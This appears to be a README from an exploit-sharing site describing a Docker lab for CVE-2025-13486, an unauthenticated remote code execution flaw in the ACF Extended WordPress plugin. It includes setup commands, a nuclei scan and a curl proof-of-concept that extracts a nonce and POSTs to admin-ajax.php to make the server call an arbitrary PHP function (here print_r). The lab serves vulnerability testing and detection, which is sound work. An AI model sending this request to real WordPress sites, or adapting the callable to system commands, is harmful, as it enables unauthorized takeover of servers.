Share
## https://sploitus.com/exploit?id=A38E4D03-C599-51F3-BBD0-B77463B708A9
# CVE-2025-13486 Vulnerable Test Environment
One-shot Docker setup for testing ACF Extended RCE vulnerability.
## Quick Start
```bash
# 1. Download plugins (run once)
./download-plugins.sh
# 2. Start environment
docker-compose up -d --build
# 3. Wait ~30 seconds for setup, then test
nuclei -t ../repo/http/cves/2025/CVE-2025-13486.yaml -u http://localhost:8888
```
## Manual Plugin Setup
If the download script fails, manually place these files in `plugins/`:
1. **ACF Pro** (required dependency)
- Download from: https://www.advancedcustomfields.com/pro/
- Save as: `plugins/acf-pro.zip`
2. **ACF Extended 0.9.0.5** (vulnerable version)
- Download from: https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
- Save as: `plugins/acf-extended.zip`
## Testing the Exploit
```bash
# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'
# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
-d "action=acfe/form/render_form_ajax&nonce=&form[render]=print_r&form[test]=PWNED"
```
## Cleanup
```bash
docker-compose down -v
```
## Vulnerability Details
- **CVE**: CVE-2025-13486
- **Affected**: ACF Extended 0.9.0.5 - 0.9.1.1
- **Type**: Unauthenticated RCE via `call_user_func_array()`
- **CVSS**: 9.8 (Critical)